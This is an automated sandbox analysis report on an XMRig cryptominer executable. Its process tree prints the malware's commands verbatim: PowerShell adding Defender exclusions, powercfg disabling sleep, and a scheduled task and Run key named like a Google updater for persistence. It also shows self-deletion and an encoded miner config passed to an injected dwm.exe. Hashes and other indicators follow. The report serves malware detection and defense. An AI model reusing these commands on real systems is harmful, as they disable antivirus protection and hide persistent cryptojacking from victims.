Overview

overview

10

Static

static

3

dridex

windows10-2004-x64

10

Analysis

  • max time kernel
    152s
  • max time network
    141s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230221-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230221-enlocale:en-usos:windows10-2004-x64system
  • submitted
    15/06/2023, 21:14

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    e80c9b5cada25f7888b69a93fd8ecc8f887b8f399abe0641c4c4f97c3a526db9.exe

  • Size

    2.0MB

  • MD5

    863359773158308ac17b5340a3b76242

  • SHA1

    8bbb4206827d73f08ef39f84db68f47f81f8d776

  • SHA256

    e80c9b5cada25f7888b69a93fd8ecc8f887b8f399abe0641c4c4f97c3a526db9

  • SHA512

    2feef58ceb9878fb157287003ee5ef3bd48b1f5e52018862c12df6b70737d3cada80a01a7bdf9444b4800b48170b0d326dcc4b39ee0a507de56e4edd64c36eb5

  • SSDEEP

    49152:OoGin4osB4YAvR0hvKg3oNG/lgLVqwBmBSnwyCKJmmBp6e:OViXv+hvKmoBBmBktCZmBpR

Score
10/10
xmrigminerupx

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 11 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner payload 15 IoCs
    miner
  • Executes dropped EXE 1 IoCs
  • UPX packed file 15 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Suspicious use of SetThreadContext 2 IoCs
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3108
      • C:\Users\Admin\AppData\Local\Temp\e80c9b5cada25f7888b69a93fd8ecc8f887b8f399abe0641c4c4f97c3a526db9.exe
        "C:\Users\Admin\AppData\Local\Temp\e80c9b5cada25f7888b69a93fd8ecc8f887b8f399abe0641c4c4f97c3a526db9.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Suspicious behavior: EnumeratesProcesses
        PID:992
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1508
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1884
        • C:\Windows\System32\powercfg.exe
          powercfg /x -hibernate-timeout-ac 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2984
        • C:\Windows\System32\powercfg.exe
          powercfg /x -hibernate-timeout-dc 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4888
        • C:\Windows\System32\powercfg.exe
          powercfg /x -standby-timeout-ac 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2268
        • C:\Windows\System32\powercfg.exe
          powercfg /x -standby-timeout-dc 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:3904
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#vjqnjk#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3932
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ltnbmgzgd#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe" }
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:3796
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
          3⤵
            PID:3308
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\e80c9b5cada25f7888b69a93fd8ecc8f887b8f399abe0641c4c4f97c3a526db9.exe"
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1008
          • C:\Windows\System32\choice.exe
            choice /C Y /N /D Y /T 3
            3⤵
              PID:4856
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
            2⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:4124
          • C:\Windows\System32\cmd.exe
            C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:1380
            • C:\Windows\System32\powercfg.exe
              powercfg /x -hibernate-timeout-ac 0
              3⤵
                PID:1016
              • C:\Windows\System32\powercfg.exe
                powercfg /x -hibernate-timeout-dc 0
                3⤵
                  PID:5116
                • C:\Windows\System32\powercfg.exe
                  powercfg /x -standby-timeout-ac 0
                  3⤵
                    PID:5044
                  • C:\Windows\System32\powercfg.exe
                    powercfg /x -standby-timeout-dc 0
                    3⤵
                      PID:3156
                  • C:\Windows\System32\conhost.exe
                    C:\Windows\System32\conhost.exe zzwbkoalj
                    2⤵
                    • Suspicious use of NtCreateUserProcessOtherParentProcess
                    • Suspicious behavior: EnumeratesProcesses
                    PID:1456
                  • C:\Windows\System32\cmd.exe
                    C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Users\Admin\AppData\Roaming\Google\Libs\g.log"
                    2⤵
                    • Suspicious use of WriteProcessMemory
                    PID:852
                    • C:\Windows\System32\Wbem\WMIC.exe
                      wmic PATH Win32_VideoController GET Name, VideoProcessor
                      3⤵
                      • Detects videocard installed
                      PID:3696
                  • C:\Windows\System32\cmd.exe
                    C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Users\Admin\AppData\Roaming\Google\Libs\g.log"
                    2⤵
                      PID:1344
                    • C:\Windows\System32\dwm.exe
                      C:\Windows\System32\dwm.exe lqeflxzifadqmuiy 6E3sjfZq2rJQaxvLPmXgsA4f0StS9pic9Xw++oZ1mnasCD7XnRLS04n/3PSQs4Y85pmzOipQFuVedLVimePMfz/K1iQprAF3Hsvc/5yykSYYXg1bCOF8/AROgrh0WbFuFrWaQ9W9CJXkaVyr3aPAjuRevGeTTOgQtV8DuLjw7FojiDBLBBUHzuyM6TUKXaA9jE5g6imTobgJY0GmGoYYzvGSXyp1ILlMl4XWxPURoBa87mEwLu44ElDwEHUz6Wfp1VnId7JgylfWjHxHC2L0sbgK37TwAUkxAeUF5EmGSYWPoc/hoOSXmLuZtiCKilw6RSw/8MPEm2oHyKYbioXceSLcBjYvoSfPuoXd4VLfsaruq1u3kozEP/1Ycvm+34XfL7uoDWEXj0af9QwU+8fCYIG1uSiRTxa7uWNm6/XTZ4oiOhtH2VQgDRS7Acu0vf6MTphkEnElFBHvPb/K3oCgw2cIAQvsXVRQfRKx8NP6GkIQoxU4MHmRCrQuoL+4HCkuF7SipHKgCTx9cND9kw/CZXWiY6yW95oyY0WkVgvBCmzD4qkzehmEVsBiRdQMS/G0etK36jDOJiwaB4FUe2xGPPFCdyEjVyr4P3MGqTpYMzRk4gkmwYo7JQoM0MYKz94u
                      2⤵
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of FindShellTrayWindow
                      • Suspicious use of SendNotifyMessage
                      PID:484
                  • C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
                    C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
                    1⤵
                    • Suspicious use of NtCreateUserProcessOtherParentProcess
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of WriteProcessMemory
                    PID:4728
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#vjqnjk#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }
                      2⤵
                      • Suspicious behavior: EnumeratesProcesses
                      PID:2964

                  Network

                        MITRE ATT&CK Enterprise v6

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads

                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                          Filesize

                          2KB

                          MD5

                          d85ba6ff808d9e5444a4b369f5bc2730

                          SHA1

                          31aa9d96590fff6981b315e0b391b575e4c0804a

                          SHA256

                          84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                          SHA512

                          8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                          Download Submit

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                          Filesize

                          944B

                          MD5

                          96b7303b3c5d43ea97d4ead95821a029

                          SHA1

                          ea1ecce72a776cd922b090f28e9d5aaca1b27539

                          SHA256

                          7e6faa0a80301b4dae2c6d499e68ad269378909cdd2dca17e972ff80d296b40f

                          SHA512

                          edc84e846ca527e28702bf981482af921d7872af10aad705b4a527921f68bd06ce38d28c6254f4197f4985297500fcecc51a9f3051915345cd2cd474e0dcd288

                          Download Submit

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                          Filesize

                          1KB

                          MD5

                          107795dbca35eddccee7f563aa948b02

                          SHA1

                          ffd0fbfafd48a022fc19d676728da99f70694183

                          SHA256

                          3fd87f6a8a12c560d127e5f8dbb91e4592e6e08febe1d675db7fd5dba26d251c

                          SHA512

                          a69f459cb0cdd2d28bdf9bfcb5f1b33801a3f4915e04b27fe6e65f6fc4cb8ab36a381f2fa93be388c6bd96f2b54fc98a3ab6ac517e3f86f50c7bfc4568d6b29c

                          Download Submit

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                          Filesize

                          1KB

                          MD5

                          6c4805e00673bef922d51b1a7137028f

                          SHA1

                          0eabb38482d1733dd85a2af9c5342c2cafcd41eb

                          SHA256

                          7af7d25fe7e3bb8b75bcffaa8573e2e9af7e7f70a840fa8bc0196d0ab396ecdd

                          SHA512

                          eb6dacb4e0da6f45028ebf65ebffdc6aecdb6a34a582bb69aa5836ef02a7115f6b500ef2dd6a2c2be994ec9d0cbbff564368724593666105d3d4475441830cc1

                          Download Submit

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                          Filesize

                          944B

                          MD5

                          11c29e3619cc1375abc369ed7e65d431

                          SHA1

                          9f9846c32fbbe87a7e77907d3f25b7ee06ff6e3d

                          SHA256

                          98d26b2206fe042c7dac6cfab5286a3e24bceb684521952941442ac8577afd6a

                          SHA512

                          14b07c366970b876d2b37e9e3375e8f4ac216c7d8be2e5eda8a81ff51d06acfd23125fddee60e1d10f0d47028335fff050370def109315b3e2cbde8b0125d7aa

                          Download Submit

                        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wlmlknq0.hyo.ps1
                          Filesize

                          60B

                          MD5

                          d17fe0a3f47be24a6453e9ef58c94641

                          SHA1

                          6ab83620379fc69f80c0242105ddffd7d98d5d9d

                          SHA256

                          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                          SHA512

                          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                          Download Submit

                        • C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
                          Filesize

                          2.0MB

                          MD5

                          863359773158308ac17b5340a3b76242

                          SHA1

                          8bbb4206827d73f08ef39f84db68f47f81f8d776

                          SHA256

                          e80c9b5cada25f7888b69a93fd8ecc8f887b8f399abe0641c4c4f97c3a526db9

                          SHA512

                          2feef58ceb9878fb157287003ee5ef3bd48b1f5e52018862c12df6b70737d3cada80a01a7bdf9444b4800b48170b0d326dcc4b39ee0a507de56e4edd64c36eb5

                          Download Submit

                        • C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
                          Filesize

                          2.0MB

                          MD5

                          863359773158308ac17b5340a3b76242

                          SHA1

                          8bbb4206827d73f08ef39f84db68f47f81f8d776

                          SHA256

                          e80c9b5cada25f7888b69a93fd8ecc8f887b8f399abe0641c4c4f97c3a526db9

                          SHA512

                          2feef58ceb9878fb157287003ee5ef3bd48b1f5e52018862c12df6b70737d3cada80a01a7bdf9444b4800b48170b0d326dcc4b39ee0a507de56e4edd64c36eb5

                          Download Submit

                        • C:\Users\Admin\AppData\Roaming\Google\Libs\g.log
                          Filesize

                          226B

                          MD5

                          fdba80d4081c28c65e32fff246dc46cb

                          SHA1

                          74f809dedd1fc46a3a63ac9904c80f0b817b3686

                          SHA256

                          b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398

                          SHA512

                          b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

                          Download Submit

                        • memory/484-220-0x00007FF62B530000-0x00007FF62BD24000-memory.dmp

                          Filesize

                          8.0MB

                          Download

                        • memory/484-214-0x00007FF62B530000-0x00007FF62BD24000-memory.dmp

                          Filesize

                          8.0MB

                          Download

                        • memory/484-233-0x00007FF62B530000-0x00007FF62BD24000-memory.dmp

                          Filesize

                          8.0MB

                          Download

                        • memory/484-239-0x00007FF62B530000-0x00007FF62BD24000-memory.dmp

                          Filesize

                          8.0MB

                          Download

                        • memory/484-241-0x00007FF62B530000-0x00007FF62BD24000-memory.dmp

                          Filesize

                          8.0MB

                          Download

                        • memory/484-224-0x00007FF62B530000-0x00007FF62BD24000-memory.dmp

                          Filesize

                          8.0MB

                          Download

                        • memory/484-222-0x00007FF62B530000-0x00007FF62BD24000-memory.dmp

                          Filesize

                          8.0MB

                          Download

                        • memory/484-226-0x00007FF62B530000-0x00007FF62BD24000-memory.dmp

                          Filesize

                          8.0MB

                          Download

                        • memory/484-237-0x00007FF62B530000-0x00007FF62BD24000-memory.dmp

                          Filesize

                          8.0MB

                          Download

                        • memory/484-235-0x00007FF62B530000-0x00007FF62BD24000-memory.dmp

                          Filesize

                          8.0MB

                          Download

                        • memory/484-218-0x00007FF62B530000-0x00007FF62BD24000-memory.dmp

                          Filesize

                          8.0MB

                          Download

                        • memory/484-228-0x00007FF62B530000-0x00007FF62BD24000-memory.dmp

                          Filesize

                          8.0MB

                          Download

                        • memory/484-209-0x00000216F3B40000-0x00000216F3B60000-memory.dmp

                          Filesize

                          128KB

                          Download

                        • memory/484-210-0x00007FF62B530000-0x00007FF62BD24000-memory.dmp

                          Filesize

                          8.0MB

                          Download

                        • memory/484-211-0x00000216F5620000-0x00000216F5660000-memory.dmp

                          Filesize

                          256KB

                          Download

                        • memory/484-213-0x00007FF62B530000-0x00007FF62BD24000-memory.dmp

                          Filesize

                          8.0MB

                          Download

                        • memory/484-216-0x00007FF62B530000-0x00007FF62BD24000-memory.dmp

                          Filesize

                          8.0MB

                          Download

                        • memory/992-162-0x00007FF69CA30000-0x00007FF69CC41000-memory.dmp

                          Filesize

                          2.1MB

                          Download

                        • memory/1456-215-0x00007FF6B1590000-0x00007FF6B15A6000-memory.dmp

                          Filesize

                          88KB

                          Download

                        • memory/1456-212-0x00007FF6B1590000-0x00007FF6B15A6000-memory.dmp

                          Filesize

                          88KB

                          Download

                        • memory/1508-142-0x000002CB7E0E0000-0x000002CB7E102000-memory.dmp

                          Filesize

                          136KB

                          Download

                        • memory/2964-200-0x00000213014E0000-0x00000213014F0000-memory.dmp

                          Filesize

                          64KB

                          Download

                        • memory/2964-199-0x00000213014E0000-0x00000213014F0000-memory.dmp

                          Filesize

                          64KB

                          Download

                        • memory/2964-198-0x00000213014E0000-0x00000213014F0000-memory.dmp

                          Filesize

                          64KB

                          Download

                        • memory/3796-173-0x0000015578050000-0x0000015578060000-memory.dmp

                          Filesize

                          64KB

                          Download

                        • memory/3796-174-0x0000015578050000-0x0000015578060000-memory.dmp

                          Filesize

                          64KB

                          Download

                        • memory/3932-159-0x000001E8B8410000-0x000001E8B8420000-memory.dmp

                          Filesize

                          64KB

                          Download

                        • memory/3932-158-0x000001E8B8410000-0x000001E8B8420000-memory.dmp

                          Filesize

                          64KB

                          Download

                        • memory/3932-157-0x000001E8B8410000-0x000001E8B8420000-memory.dmp

                          Filesize

                          64KB

                          Download

                        • memory/3932-156-0x000001E8B8410000-0x000001E8B8420000-memory.dmp

                          Filesize

                          64KB

                          Download

                        • memory/4728-205-0x00007FF78BC20000-0x00007FF78BE31000-memory.dmp

                          Filesize

                          2.1MB

                          Download